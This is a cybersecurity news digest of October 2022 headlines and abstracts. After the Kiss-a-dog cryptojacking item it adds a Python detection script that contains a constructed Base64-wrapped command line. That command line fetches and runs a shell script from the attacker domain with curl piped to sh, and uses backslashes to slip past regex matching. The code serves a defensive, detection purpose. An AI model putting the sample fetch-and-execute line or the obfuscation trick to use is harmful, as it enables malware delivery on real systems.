New Cryptojacking Campaign Targeting Vulnerable Docker and Kubernetes Instances
Abstract
A new cryptojacking campaign has been uncovered targeting vulnerable Docker and Kubernetes infrastructures as part of opportunistic attacks designed to illicitly mine cryptocurrency. Cybersecurity company CrowdStrike dubbed the activity Kiss-a-dog, with its command-and-control infrastructure overlapping with those associated with other groups like TeamTNT, which are known to strike misconfigured Docker and Kubernetes instances. The intrusions, spotted in September 2022, get their name from a domain named "kiss.a-dog[.]top" that's used to trigger a shell script payload on the compromised container using a Base64-encoded Python command. "The URL used in the payload is obscured with backslashes to defeat automated decoding and regex matching to retrieve the malicious domain," CrowdStrike researcher Manoj Ahuje said in a technical analysis. The attack chain subsequently attempts to escape the container and move laterally into the breached network, wh… (Source: The Hacker News)
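The backslash trick quoted above deserves a concrete handling step in detection tooling: the shell strips the backslashes before the request is made, so the command still works, while a regex run over the raw decoded payload never sees the domain. What follows is an added example written for this digest, not CrowdStrike's code and not the real Kiss-a-dog payload. It assumes the one-liner has the shape `python -c "...b64decode('...')..."` and that the obscuring consists of backslashes inserted between characters of the host name (an assumption; the report's exact form is not reproduced here). The sample command line is constructed inline. The scanner decodes the Base64 blob, applies shell-style backslash removal, and only then extracts the host, so the defanged domain named in the abstract surfaces where a naive regex fails.

```python
import base64
import re

# Constructed sample (hypothetical, not the real Kiss-a-dog artifact): the Python body
# that the one-liner decodes and exec()s. Backslashes break up the host name; the shell
# running the curl command strips them, so "k\i\s\s.a-d\o\g.t\o\p" is requested as
# "kiss.a-dog.top", but a regex over this text never sees that string.
# (Letters such as t, n, a are left unescaped on purpose: "\t" would be a tab in Python.)
DECODED_BODY = r'''import os
os.system("curl -fsSL http://k\i\s\s.a-d\o\g.t\o\p/t.sh | sh")
'''

# The command line as a container process table or audit log would record it (constructed).
SAMPLE_CMDLINE = 'python3 -c "import base64;exec(base64.b64decode(\'{}\'))"'.format(
    base64.b64encode(DECODED_BODY.encode()).decode()
)

B64_IN_CMD = re.compile(r"b64decode\(['\"]([A-Za-z0-9+/=]+)['\"]\)")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
KNOWN_BAD_HOSTS = {"kiss.a-dog.top"}  # from the abstract, where it is defanged as kiss.a-dog[.]top


def extract_b64_payloads(cmdline: str) -> list:
    """Pull every b64decode('...') argument out of a command line and decode it."""
    payloads = []
    for blob in B64_IN_CMD.findall(cmdline):
        try:
            payloads.append(base64.b64decode(blob, validate=True))
        except ValueError:
            continue  # not valid Base64: skip rather than crash the scanner
    return payloads


def shell_unescape(text: str) -> str:
    """Undo backslash escaping the way a POSIX shell does for unquoted text: backslash-x becomes x."""
    return re.sub(r"\\(.)", r"\1", text)


def extract_hosts(text: str) -> list:
    """Host names of every http(s) URL in the text, in order of appearance."""
    return HOST_RE.findall(text)


def analyze(cmdline: str) -> dict:
    """Hosts found by a naive regex, hosts found after shell-style normalization, and indicator hits."""
    naive, normalized = [], []
    for payload in extract_b64_payloads(cmdline):
        decoded = payload.decode("utf-8", errors="replace")
        naive.extend(extract_hosts(decoded))
        normalized.extend(extract_hosts(shell_unescape(decoded)))
    return {
        "naive": naive,
        "normalized": normalized,
        "matched": sorted(set(normalized) & KNOWN_BAD_HOSTS),
    }


if __name__ == "__main__":
    print(analyze(SAMPLE_CMDLINE))
```

Run it over command lines harvested from the container's process list or an audit log; the `matched` entry is the hit to alert on. The normalization step belongs in front of any indicator match, since skipping it is exactly what this obfuscation counts on.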
October 27, 2022 – Denial Of Service
Fodcha DDoS botnet reaches 1Tbps in power, injects ransoms in packets
Abstract
A new version of the Fodcha DDoS botnet has emerged, featuring ransom demands embedded in packets and new features to evade detection of its infrastructure. (Source: BleepingComputer)
October 26, 2022 – Hacker
Notorious ‘BestBuy’ hacker arraigned for running dark web market
Abstract
A notorious British hacker was arraigned on Wednesday by the U.S. Department of Justice for allegedly running the now-defunct 'The Real Deal' dark web marketplace. (Source: BleepingComputer)
October 26, 2022 – Business
Spyderbat Raises $10M in Series A Funding
Abstract
The Austin, TX-based cloud-native runtime security company raised $10M in Series A funding. The round was led by NTTVC with participation from LiveOak Venture Partners, Benhamou Global Ventures, and John McHale. (Source: FinSMEs)
October 26, 2022 – Policy and Law
U.S. Charges Ukrainian Hacker Over Role in Raccoon Stealer Malware Service
Abstract
A 26-year-old Ukrainian national has been charged in the U.S. for his alleged role in the Raccoon Stealer malware-as-a-service (MaaS) operation. Mark Sokolovsky, who was arrested by Dutch law enforcement after leaving Ukraine on March 4, 2022, in what's said to be a Porsche Cayenne, is currently being held in the Netherlands and awaits extradition to the U.S. "Individuals who deployed Raccoon Infostealer to steal data from victims leased access to the malware for approximately $200 per month, paid for by cryptocurrency," the U.S. Department of Justice (DoJ) said. "These individuals used various ruses, such as email phishing, to install the malware onto the computers of unsuspecting victims." Sokolovsky is said to have gone by various online monikers like Photix, raccoonstealer, and black21jack77777 on online cybercrime forums to advertise the service for sale. Raccoon Stealer, mainly distributed under the guise of cracked software, is known to be one o… (Source: The Hacker News)
October 26, 2022 – Vulnerabilities
OpenSSL to fix the second critical flaw ever
Abstract
The OpenSSL Project announced an upcoming update to address a critical vulnerability in the open-source toolkit. The OpenSSL Project announced that it is going to release updates to address a critical vulnerability in the open-source toolkit. Experts... (Source: Security Affairs)
October 26, 2022 – Solution
LinkedIn’s new security features combat fake profiles, threat actors
Abstract
LinkedIn has introduced three new features to fight fake profiles and malicious use of the platform, including a new method to confirm whether a profile is authentic by showing whether it has a verified work email or phone number. (Source: BleepingComputer)
October 26, 2022 – Business
Valence Security raises fresh capital to secure the SaaS app supply chain
Abstract
The $25 million Series A round was led by M12, Microsoft's corporate venture arm, with participation from YL Ventures, Porsche Ventures, Akamai Technologies, Alumni Ventures, and former Symantec CEO Michael Fey. (Source: Tech Crunch)
October 26, 2022 – Education
This 9-Course Bundle Can Take Your Cybersecurity Skills to the Next Level
Abstract
If you regularly read The Hacker News, there's a fair chance that you know something about cybersecurity. It's possible to turn that interest into a six-figure career. But to make the leap, you need to pick up some key skills and professional certifications. Featuring nine in-depth courses, The 2022 Masters in Cyber Security Certification Bundle helps you get ready for the next step. And in a special reader offer, you can get lifetime access for only $39.99. Special Offer — This bundle contains nine courses with a total value of $1,800. But for a limited time, you can get lifetime on-demand access for only $39.99. That is a massive 97% off MSRP! From penetration testing to threat analysis, there are thousands of vacant roles in the cybersecurity industry right now. What's more, this trend is set to continue, with experts predicting a 12% growth within the industry in the remainder of this decade. The really exciting part is that anyone can land a highly paid job within… (Source: The Hacker News)
October 26, 2022 – Breach
See Tickets discloses data breach, customers’ credit card data exposed
Abstract
International ticketing services company See Tickets disclosed a data breach that exposed customers' payment card details. Ticketing service company See Tickets disclosed a data breach, and threat actors might have accessed customers' payment card... (Source: Security Affairs)
October 26, 2022 – Education
Outpost24: How Pentesting-as-a-Service finds vulnerabilities before they’re exploited
Abstract
Organizations need to continuously monitor their entire attack surface to adequately reduce application risk. This is where Outpost24's Pentesting-as-a-Service (PTaaS) software comes in. (Source: BleepingComputer)
October 26, 2022 – Vulnerabilities
Google Patches 14 Vulnerabilities with the Release of Chrome 107
Abstract
Google this week announced the release of Chrome 107 to the stable channel, with patches for 14 vulnerabilities, including high-severity bugs reported by external researchers. (Source: Security Week)
October 26, 2022 – Hacker
Kimsuky Hackers Spotted Using 3 New Android Malware to Target South Koreans
Abstract
The North Korean espionage-focused actor known as Kimsuky has been observed using three different Android malware strains to target users located in its southern counterpart. That's according to findings from South Korean cybersecurity company S2W, which named the malware families FastFire, FastViewer, and FastSpy. "The FastFire malware is disguised as a Google security plugin, and the FastViewer malware disguises itself as 'Hancom Office Viewer,' [while] FastSpy is a remote access tool based on AndroSpy," researchers Lee Sebin and Shin Yeongjae said. Kimsuky, also known by the names Black Banshee, Thallium, and Velvet Chollima, is believed to be tasked by the North Korean regime with a global intelligence-gathering mission, disproportionately targeting individuals and organizations in South Korea, Japan, and the U.S. This past August, Kaspersky unearthed a previously undocumented infection chain dubbed GoldDragon to deploy a Windows backdoor capable o… (Source: The Hacker News)
October 26, 2022 – Policy and Law
US charges Ukrainian man with Raccoon Infostealer operation
Abstract
US authorities charged a Ukrainian man with computer fraud for allegedly infecting millions of computers with Raccoon Infostealer. The US Justice Department charged a Ukrainian man, Mark Sokolovsky (26), with computer fraud for allegedly infecting... (Source: Security Affairs)
October 26, 2022 – Breach
Medibank now says hackers accessed all its customers’ personal data
Abstract
Australian insurance firm Medibank has confirmed that hackers accessed all of its customers' personal data and a large amount of health claims data during a recent ransomware attack. (Source: BleepingComputer)
October 26, 2022 – Government
CISA Seeks Feedback on Baseline Measures to Secure Cloud Configuration
Abstract
CISA is inviting public comment, particularly from agencies, on what it's proposing as the bare minimum set of actions organizations should take to control access to their assets in cloud environments, and how to implement them. (Source: Nextgov)
October 26, 2022 – Hacker
Unknown Actors are Deploying RomCom RAT to Target Ukrainian Military
Abstract
The threat actor behind a remote access trojan called RomCom RAT has been observed targeting Ukrainian military institutions as part of a new spear-phishing campaign that commenced on October 21, 2022. The development marks a shift in the attacker's modus operandi, which has previously involved spoofing legitimate apps like Advanced IP Scanner and pdfFiller to drop backdoors on compromised systems. "The initial 'Advanced IP Scanner' campaign occurred on July 23, 2022," the BlackBerry research and intelligence team said. "Once the victim installs a Trojanized bundle, it drops RomCom RAT to the system." While previous iterations of the campaign involved the use of trojanized Advanced IP Scanner, the unidentified adversarial collective has since switched to pdfFiller as of October 20, indicating an active attempt on the part of the adversary to refine tactics and thwart detection. These lookalike websites host a rogue installer package that r… (Source: The Hacker News)
October 26, 2022 – Vulnerabilities
Two flaws in Cisco AnyConnect Secure Mobility client for Windows actively exploited
Abstract
Cisco warns of active exploitation attempts targeting two vulnerabilities in the Cisco AnyConnect Secure Mobility Client for Windows. Cisco is warning of exploitation attempts targeting two security flaws, tracked as CVE-2020-3153 (CVSS score: 6.5)... (Source: Security Affairs)
October 26, 2022 – Vulnerabilities
Microsoft fixes Windows vulnerable driver blocklist sync issue
Abstract
Microsoft says it addressed an issue preventing the Windows kernel vulnerable driver blocklist from being synced to systems running older Windows versions. (Source: BleepingComputer)
October 26, 2022 – Vulnerabilities
OpenSSL to Patch First Critical Vulnerability Since 2016
Abstract
OpenSSL version 3.0.7 is scheduled for Tuesday, November 1, between 13:00 and 17:00 UTC. No details have been provided, but it has been described as a ‘security-fix release’ that will include a patch for a vulnerability rated ‘critical’. (Source: Security Week)
October 26, 2022 – Hacker
Vice Society Hackers Are Behind Several Ransomware Attacks Against Education Sector
Abstract
A cybercrime group known as Vice Society has been linked to multiple ransomware strains in its malicious campaigns aimed at the education, government, and retail sectors. The Microsoft Security Threat Intelligence team, which is tracking the threat cluster under the moniker DEV-0832, said the group avoids deploying ransomware in some cases and instead likely carries out extortion using exfiltrated stolen data. "Shifting ransomware payloads over time from BlackCat, Quantum Locker, and Zeppelin, DEV-0832's latest payload is a Zeppelin variant that includes Vice Society-specific file extensions, such as .v-s0ciety, .v-society, and, most recently, .locked," the tech giant's cybersecurity division said. Vice Society, active since June 2021, has been steadily observed encrypting and exfiltrating victim data, and threatening companies with exposure of siphoned information to pressure them into paying a ransom. "Unlike other RaaS (Ransomware-as-a-Service)… (Source: The Hacker News)
October 26, 2022 – Vulnerabilities
VMware fixes critical RCE in VMware Cloud Foundation
Abstract
VMware addressed a critical remote code execution vulnerability in VMware Cloud Foundation tracked as CVE-2021-39144. VMware has released security updates to address a critical vulnerability, tracked as CVE-2021-39144 (CVSSv3 9.8), in VMware Cloud... (Source: Security Affairs)
October 26, 2022 – Vulnerabilities
Apple Patches Over 100 Vulnerabilities With Release of macOS Ventura 13
Abstract
A total of 112 CVE identifiers are listed in Apple's security advisory for macOS Ventura 13, including issues that are specific to the operating system and flaws impacting third-party components. (Source: Security Week)
October 26, 2022 – Vulnerabilities
Hackers Actively Exploiting Cisco AnyConnect and GIGABYTE Drivers Vulnerabilities
Abstract
Cisco has warned of active exploitation attempts targeting a pair of two-year-old security flaws in the Cisco AnyConnect Secure Mobility Client for Windows. Tracked as CVE-2020-3153 (CVSS score: 6.5) and CVE-2020-3433 (CVSS score: 7.8), the vulnerabilities could enable local authenticated attackers to perform DLL hijacking and copy arbitrary files to system directories with elevated privileges. While CVE-2020-3153 was addressed by Cisco in February 2020, a fix for CVE-2020-3433 was shipped in August 2020. "In October 2022, the Cisco Product Security Incident Response Team became aware of additional attempted exploitation of this vulnerability in the wild," the networking equipment maker said in an updated advisory. "Cisco continues to strongly recommend that customers upgrade to a fixed software release to remediate this vulnerability." The alert comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) moved to add the two flaws to its K… (Source: The Hacker News)
October 26, 2022 – Vulnerabilities
VMware Releases Patch for Critical RCE Flaw in Cloud Foundation Platform
Abstract
VMware on Tuesday shipped security updates to address a critical security flaw in its VMware Cloud Foundation product. Tracked as CVE-2021-39144, the issue has been rated 9.8 out of 10 on the CVSS vulnerability scoring system, and relates to a remote code execution vulnerability via the XStream open source library. "Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of 'root' on the appliance," the company said in an advisory. In light of the severity of the flaw and its relatively low bar for exploitation, the Palo Alto-based virtualization services provider has also made available a patch for end-of-life products. Also addressed by VMware as part of the update is CVE-2022-31678 (CVSS score: 5.3), an XML External Entity (XXE) vulnerability that could be exploited to result in a denial-of-service (DoS) condition or unauthorized info… (Source: The Hacker News)
October 25, 2022 – Vulnerabilities
Cisco warns admins to patch AnyConnect flaw exploited in attacks
Abstract
Cisco warned customers today that two security vulnerabilities in the Cisco AnyConnect Secure Mobility Client for Windows are being exploited in the wild. (Source: BleepingComputer)
October 25, 2022 – APT
SideWinder APT Uses New WarHawk Backdoor Against Pakistan
Abstract
Nation-state actor SideWinder compromised the official website of Pakistan's National Electric Power Regulatory Authority (NEPRA) to deliver a tailored malware called WarHawk. Multiple malicious modules in WarHawk deliver Cobalt Strike, including new TTPs such as KernelCallBackTable injection and checking... (Source: Cyware Alerts - Hacker News)
October 25, 2022 – Vulnerabilities
Experts disclosed a 22-year-old bug in popular SQLite Database library
Abstract
A high-severity vulnerability, tracked as CVE-2022-35737, has been disclosed in the SQLite database library. The security expert Andreas Kellas detailed a high-severity vulnerability, tracked as CVE-2022-35737 (CVSS score: 7.5), in the SQLite database... (Source: Security Affairs)
October 25, 2022 – Breach
See Tickets discloses 2.5-year-long credit card theft breach
Abstract
Ticketing service provider 'See Tickets' has disclosed a data breach, informing customers that cybercriminals might have accessed their payment card details via a skimmer on its website. (Source: BleepingComputer)
October 25, 2022 – Malware
BlackByte Adds Exbyte Exfiltration Tool to Strengthen Extortion Game
Abstract
BlackByte ransomware operators have started deploying a new exfiltration tool, named Exbyte, to speed up data theft and upload stolen data to an external server. Exbyte is a Go-based exfiltration tool that uploads stolen files directly to the Mega cloud storage service. With new custom tools, distribut... (Source: Cyware Alerts - Hacker News)
October 25, 2022 – Vulnerabilities
22-Year-Old Vulnerability Reported in Widely Used SQLite Database Library
Abstract
A high-severity vulnerability has been disclosed in the SQLite database library, which was introduced as part of a code change dating all the way back to October 2000 and could enable attackers to crash or control programs. Tracked as CVE-2022-35737 (CVSS score: 7.5), the 22-year-old issue affects SQLite versions 1.0.12 through 3.39.1, and has been addressed in version 3.39.2 released on July 21, 2022. "CVE-2022-35737 is exploitable on 64-bit systems, and exploitability depends on how the program is compiled," Trail of Bits researcher Andreas Kellas said in a technical write-up published today. "Arbitrary code execution is confirmed when the library is compiled without stack canaries, but unconfirmed when stack canaries are present, and denial-of-service is confirmed in all cases." Programmed in C, SQLite is the most widely used database engine, included by default in Android, iOS, Windows, and macOS, as well as popular web browsers such as Googl… (Source: The Hacker News)
October 25, 2022 – Malware
Two PoS Malware used to steal data from more than 167,000 credit cards
Abstract
Researchers reported that threat actors used two PoS malware variants to steal information about more than 167,000 credit cards. Cybersecurity firm Group-IB discovered two PoS malware strains used to steal data associated with more than 167,000 credit cards from... (Source: Security Affairs)
October 25, 2022 – Malware
Ukrainian charged for operating Raccoon Stealer malware service
Abstract
26-year-old Ukrainian national Mark Sokolovsky has been charged for his involvement in the Raccoon Stealer malware-as-a-service (MaaS) cybercrime operation. (Source: BleepingComputer)
October 25, 2022 – Attack
Emotet Launches Attacks with One-Click Attack Technique
Abstract
Trustwave SpiderLabs noted a spike in malspam campaigns by the Emotet botnet. In this attack wave, attackers are reportedly using invoice-themed phishing lures with password-protected archive files. These files drop CoinMiner and Quasar RAT to take over compromised systems. (Source: Cyware Alerts - Hacker News)
October 25, 2022 – Breach
Hive Ransomware Hackers Begin Leaking Data Stolen from Tata Power Energy Company
Abstract
The Hive ransomware-as-a-service (RaaS) group has claimed responsibility for a cyber attack against Tata Power that was disclosed by the company less than two weeks ago. The incident is said to have occurred on October 3, 2022. The threat actor has also been observed leaking stolen data exfiltrated prior to encrypting the network as part of its double extortion scheme. This allegedly comprises signed client contracts, agreement documents, as well as other sensitive information such as emails, addresses, phone numbers, passport numbers, and taxpayer data, among others. The Mumbai-based firm, which is India's largest integrated power company, is part of the Tata Group conglomerate. Tata Power had previously disclosed in a filing with the National Stock Exchange (NSE) of India that an intrusion on the company's IT infrastructure impacted "some of its IT systems." According to further details shared by security researcher Rakesh Krishnan, the leak contains person… (Source: The Hacker News)
October 25, 2022 – Criminals
Hive ransomware gang starts leaking data allegedly stolen from Tata Power
Abstract
The Hive ransomware gang, which claimed responsibility for the Tata Power data breach, has started leaking data. On October 14, Tata Power, India's largest power generation company, announced that it was hit by a cyber attack. Threat actors hit the Information... (Source: Security Affairs)
October 25, 2022 – Ransomware
Microsoft: Vice Society targets schools with multiple ransomware families
Abstract
A threat group known as Vice Society has been switching ransomware payloads in attacks targeting the education sector across the United States and worldwide. (Source: BleepingComputer)
October 25, 2022 – Botnet
Emotet Botnet Drops Malware via Self-Unlocking Password-Protected RAR Files
Abstract
In an attack chain detected by Trustwave SpiderLabs researchers, an invoice-themed ZIP file lure was found to contain a nested self-extracting (SFX) archive, with the first archive having the purpose of launching the second. (Source: Heimdal Security)
October 25, 2022 – Vulnerabilities
Researchers Detail Windows Event Log Vulnerabilities: LogCrusher and OverLog
Abstract
Cybersecurity researchers have disclosed details about a pair of vulnerabilities in Microsoft Windows, one of which could be exploited to result in a denial-of-service (DoS). The exploits, dubbed LogCrusher and OverLog by Varonis, take aim at the EventLog Remoting Protocol (MS-EVEN), which enables remote access to event logs. While the former allows "any domain user to remotely crash the Event Log application of any Windows machine," OverLog causes a DoS by "filling the hard drive space of any Windows machine on the domain," Dolev Taler said in a report shared with The Hacker News. OverLog has been assigned the CVE identifier CVE-2022-37981 (CVSS score: 4.3) and was addressed by Microsoft as part of its October Patch Tuesday updates. LogCrusher, however, remains unresolved. "The performance can be interrupted and/or reduced, but the attacker cannot fully deny service," the tech giant said in an advisory for the flaw released earlier this m… (Source: The Hacker News)
October 25, 2022 – Malware
Dormant Colors campaign operates over 1M malicious Chrome extensions
Abstract
A new malvertising campaign, code-named Dormant Colors, is delivering malicious Google Chrome extensions that hijack targets' browsers. Researchers at Guardio Labs have discovered a new malvertising campaign, called Dormant Colors, aimed at delivering... (Source: Security Affairs)
October 25, 2022 – Criminals
Dutch police arrest hacker who breached healthcare software vendor Full Text
Abstract
The Dutch police have arrested a 19-year-old man in western Netherlands, suspected of breaching the systems of a healthcare software vendor in the country, and stealing tens of thousands of documents.BleepingComputer
October 25, 2022 – Criminals
Crooks Use Two Different POS Malware to Steal 167,000 Credit Card Numbers Full Text
Abstract
The MajikPOS and Treasure Hunter malware infect Windows POS terminals and scan the devices to exploit the moments when card data is read and stored in plain text in memory.The Register
October 25, 2022 – Education
How the Software Supply Chain Security is Threatened by Hackers Full Text
Abstract
Introduction In many ways, the software supply chain is similar to that of manufactured goods, which we all know has been largely impacted by a global pandemic and shortages of raw materials. However, in the IT world, it is not shortages or pandemics that have been the main obstacles to overcome in recent years, but rather attacks aimed at using them to harm hundreds or even thousands of victims simultaneously. If you've heard of a cyber attack between 2020 and today, it's likely that the software supply chain played a role. When we talk about an attack on the software supply chain, we are actually referring to two successive attacks: one that targets a supplier, and one that targets one or more downstream users in the chain, using the first as a vehicle. In this article, we will dive into the mechanisms and risks of the software supply chain by looking at a typical vulnerability of the modern development cycle: the presence of personal identifying information, or "The Hacker News
October 25, 2022 – Vulnerabilities
VMware fixes critical Cloud Foundation remote code execution bug Full Text
Abstract
VMware has released security updates today to fix a critical vulnerability in VMware Cloud Foundation, a hybrid cloud platform for running enterprise apps in private or public environments.BleepingComputer
October 25, 2022 – Government
CISA Warns of Attacks Exploiting Cisco, Gigabyte Vulnerabilities Full Text
Abstract
The Cisco product vulnerabilities both impact the AnyConnect Secure Mobility Client for Windows. They can be exploited by a local, authenticated attacker to execute arbitrary code and copy files to arbitrary locations with elevated privileges.Security Week
October 25, 2022 – Criminals
Cybercriminals Used Two PoS Malware to Steal Details of Over 167,000 Credit Cards Full Text
Abstract
Two point-of-sale (PoS) malware variants have been put to use by a threat actor to steal information related to more than 167,000 credit cards from payment terminals. According to Singapore-headquartered cybersecurity company Group-IB, the stolen data dumps could net the operators as much as $3.34 million by selling them on underground forums. While a significant proportion of attacks aimed at gathering payment data rely on JavaScript sniffers (aka web skimmers) stealthily inserted on e-commerce websites, PoS malware continues to be an ongoing, if less popular, threat. Just last month, Kaspersky detailed new tactics adopted by a Brazilian threat actor known as Prilex to steal money by means of fraudulent transactions. "Almost all PoS malware strains have a similar card dump extraction functionality, but different methods for maintaining persistence on infected devices, data exfiltration and processing," researchers Nikolay Shelekhov and Said Khamchiev said. TreaThe Hacker News
October 25, 2022 – Cryptocurrency
Massive cryptomining campaign abuses free-tier cloud dev resources Full Text
Abstract
An automated and large-scale 'freejacking' campaign abuses free GitHub, Heroku, and Buddy services to mine cryptocurrency at the provider's expense.BleepingComputer
October 25, 2022 – Attack
Hackers hit cybersecurity conference in Australia Full Text
Abstract
The Australian Institute of Company Directors (AICD) had some solid names lending support to the launch of the institute’s new set of “cybersecurity governance principles”, but the event did not start on time due to the hacking incident.Sydney Morning Herald
October 25, 2022 – Vulnerabilities
Apple Releases Patch for New Actively Exploited iOS and iPadOS Zero-Day Vulnerability Full Text
Abstract
Tech giant Apple on Monday rolled out updates to remediate a zero-day flaw in iOS and iPadOS that it said has been actively exploited in the wild. The weakness, given the identifier CVE-2022-42827, has been described as an out-of-bounds write issue in the Kernel, which could be abused by a rogue application to execute arbitrary code with the highest privileges. Successful exploitation of out-of-bounds write flaws, which typically occur when a program attempts to write data to a memory location that's outside of the bounds of what it is allowed to access, can result in corruption of data, a crash, or execution of unauthorized code. The iPhone maker said it addressed the bug with improved bounds checking, while crediting an anonymous researcher for reporting the vulnerability. As is usually the case with actively exploited zero-day flaws, Apple refrained from sharing more specifics about the shortcoming other than acknowledging that it's "aware of a report that this iThe Hacker News
October 25, 2022 – Solution
New Samsung Maintenance Mode protects your data during phone repairs Full Text
Abstract
After a successful pilot program in Korea, Samsung is now rolling out 'Maintenance Mode' to select Galaxy devices globally, to help users protect their sensitive data when they hand over their smartphones at service points.BleepingComputer
October 25, 2022 – Vulnerabilities
Jira Align Vulnerabilities Exposed Atlassian Infrastructure to Attacks Full Text
Abstract
Vulnerabilities addressed recently in Jira Align could allow an attacker to elevate privileges, obtain Atlassian cloud credentials, and potentially go after Atlassian infrastructure, researchers with Bishop Fox warn.Security Week
October 25, 2022 – Education
How the “pizza123” password could take down an organization Full Text
Abstract
The breach, the bitter taste of pizza123, and the plight of malicious push notifications demand caution when selecting and managing passwords.BleepingComputer
October 25, 2022 – Breach
Hive claims ransomware attack on Tata Power, begins leaking data Full Text
Abstract
Hive ransomware group has claimed responsibility for a cyber attack disclosed by Tata Power this month. In screenshots seen by BleepingComputer, Hive operators are leaking data they claim to have stolen from Tata Power, indicating the ransom negotiations failed.BleepingComputer
October 24, 2022 – Malware
Chrome extensions with 1 million installs hijack targets’ browsers Full Text
Abstract
Researchers at Guardio Labs have discovered a new malvertising campaign pushing Google Chrome and Microsoft Edge extensions that hijack searches and insert affiliate links into webpages.BleepingComputer
October 24, 2022 – Breach
Hacktivists ‘Steal’ 100,000 Emails from Iran Nuclear Agency Full Text
Abstract
An activist group that calls itself Black Reward and claims to be from Iran claimed that it had accessed an email server run by a company related to Iran's Atomic Energy Organization and exfiltrated 324 inboxes comprising over 100,000 messages.The Register
October 24, 2022 – Education
Download eBook: Top virtual CISOs share 7 tips for vCISO service providers Full Text
Abstract
Virtual Chief Information Security Officer (vCISO) services (also known as 'Fractional CISO' or 'CISO-as-a-Service') are growing in popularity, especially as growing cyber threats, tightening regulatory demands and strict cyber insurance requirements are driving small to medium-sized enterprises' demand for strategic cybersecurity and compliance guidance and management. But vCISO services are labor intensive, require highly skilled experts, and are difficult to scale. So, how exactly do successful vCISO providers overcome these obstacles? When you want advice on how to overcome challenges, scale and expand, who better to go to than the people who have been there, seen it, and done it with success? In a new eBook, titled 'Top virtual CISOs share: 7 tips on how vCISO service providers can maximize services, increase revenues, and improve margins' (Download here), vCISO platform provider Cynomi interviewed some of America's top vCISO service providers (MSThe Hacker News
October 24, 2022 – Vulnerabilities
Apple fixed the ninth actively exploited zero-day this year Full Text
Abstract
Apple released security updates that addressed the ninth zero-day vulnerability actively exploited in the wild since the start of the year. Apple has addressed the ninth zero-day vulnerability exploited in attacks in the wild since the start of the year. The...Security Affairs
October 24, 2022 – Vulnerabilities
Apple fixes new zero-day used in attacks against iPhones, iPads Full Text
Abstract
In security updates released on Monday, Apple has fixed the ninth zero-day vulnerability used in attacks against iPhones since the start of the year.BleepingComputer
October 24, 2022 – Malware
Security experts targeted with malicious CVE PoC exploits on GitHub Full Text
Abstract
A team of researchers at the Leiden Institute of Advanced Computer Science discovered thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for multiple vulnerabilities.Security Affairs
October 24, 2022 – APT
SideWinder APT Using New WarHawk Backdoor to Target Entities in Pakistan Full Text
Abstract
SideWinder, a prolific nation-state actor mainly known for targeting Pakistan military entities, compromised the official website of the National Electric Power Regulatory Authority (NEPRA) to deliver a tailored malware called WarHawk. "The newly discovered WarHawk backdoor contains various malicious modules that deliver Cobalt Strike, incorporating new TTPs such as KernelCallBackTable injection and Pakistan Standard Time zone check in order to ensure a victorious campaign," Zscaler ThreatLabz said. The threat group, also called APT-C-17, Rattlesnake, and Razor Tiger, is suspected to be an Indian state-sponsored group, although a report from Kaspersky earlier this May acknowledged that previous indicators that led to the attribution have since disappeared, making it challenging to link the threat cluster to a specific nation. More than 1,000 attacks are said to have been launched by the group since April 2020, an indication of SideWinder's newfound aggressionThe Hacker News
October 24, 2022 – Government
Cuba ransomware affiliate targets Ukraine, CERT-UA warns Full Text
Abstract
The Ukraine Computer Emergency Response Team (CERT-UA) warns of Cuba Ransomware attacks against critical networks in the country. The Ukraine Computer Emergency Response Team (CERT-UA) warns of potential Cuba Ransomware attacks against local critical...Security Affairs
October 24, 2022 – Breach
Iran’s atomic energy agency confirms hack after stolen data leaked online Full Text
Abstract
The Iranian Atomic Energy Organization (AEOI) has confirmed that one of its subsidiaries' email servers was hacked after the 'Black Reward' hacking group published stolen data online.BleepingComputer
October 24, 2022 – Government
FBI Warns of Iranian Cyber Firm’s Hack-and-Leak Operations Full Text
Abstract
Previously known as Eeleyanet Gostar and Net Peygard Samavat, Emennet Pasargad is an organization that often changes its name to avoid US sanctions, and which is known for providing cybersecurity services to government entities in Iran.Security Week
October 24, 2022 – Government
CISA Warns of Daixin Team Hackers Targeting Health Organizations With Ransomware Full Text
Abstract
U.S. cybersecurity and intelligence agencies have published a joint advisory warning of attacks perpetrated by a cybercrime gang known as the Daixin Team primarily targeting the healthcare sector in the country. "The Daixin Team is a ransomware and data extortion group that has targeted the HPH Sector with ransomware and data extortion operations since at least June 2022," the agencies said. The alert was published Friday by the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS). Over the past four months, the group has been linked to multiple ransomware incidents in the Healthcare and Public Health (HPH) sector, encrypting servers related to electronic health records, diagnostics, imaging, and intranet services. It's also said to have exfiltrated personally identifiable information (PII) and patient health information (PHI) as part of a double extortion scheme to seThe Hacker News
October 24, 2022 – Government
Norway PM warns of Russia cyber threat to oil and gas industry Full Text
Abstract
Norway’s prime minister warned last week that Russia poses “a real and serious threat” to the country’s oil and gas industry. Norway’s prime minister Jonas Gahr Støre warned that Russia poses “a real and serious threat” to the country’s...Security Affairs
October 24, 2022 – Ransomware
Cuba ransomware affiliate targets Ukrainian govt agencies Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has issued an alert about potential Cuba Ransomware attacks against critical networks in the country.BleepingComputer
October 24, 2022 – Breach
Data of alleged 2.6m Carousell accounts being sold on Dark Web, hacking forums Full Text
Abstract
The breached database, allegedly containing the information of 2.6 million accounts, is being sold for $1,000. Carousell said that 1.95 million user accounts were affected.Straits Times
October 24, 2022 – General
Why Ransomware in Education on the Rise and What That Means for 2023 Full Text
Abstract
The breach of LA Unified School District (LAUSD) highlights the prevalence of password vulnerabilities, as criminal hackers continue to use breached credentials in increasingly frequent ransomware attacks on education. The Labor Day weekend breach of LAUSD brought significant districtwide disruptions to access to email, computers, and applications. It's unclear what student or employee data the attackers exfiltrated. There is a significant trend in ransomware breaches in education, a highly vulnerable sector. The transitory nature of students leaves accounts and passwords vulnerable. The open environments schools create to foster student exploration and the relative naivete in the sector regarding cybersecurity invite attacks. The breach at LAUSD and what happened afterward: Four days post-breach, reports came that criminals had offered credentials for accounts inside the school district's network for sale on the dark web months before the attack. The stolen credentialThe Hacker News
October 24, 2022 – Malware
Malicious Clicker apps in Google Play have 20M+ installs Full Text
Abstract
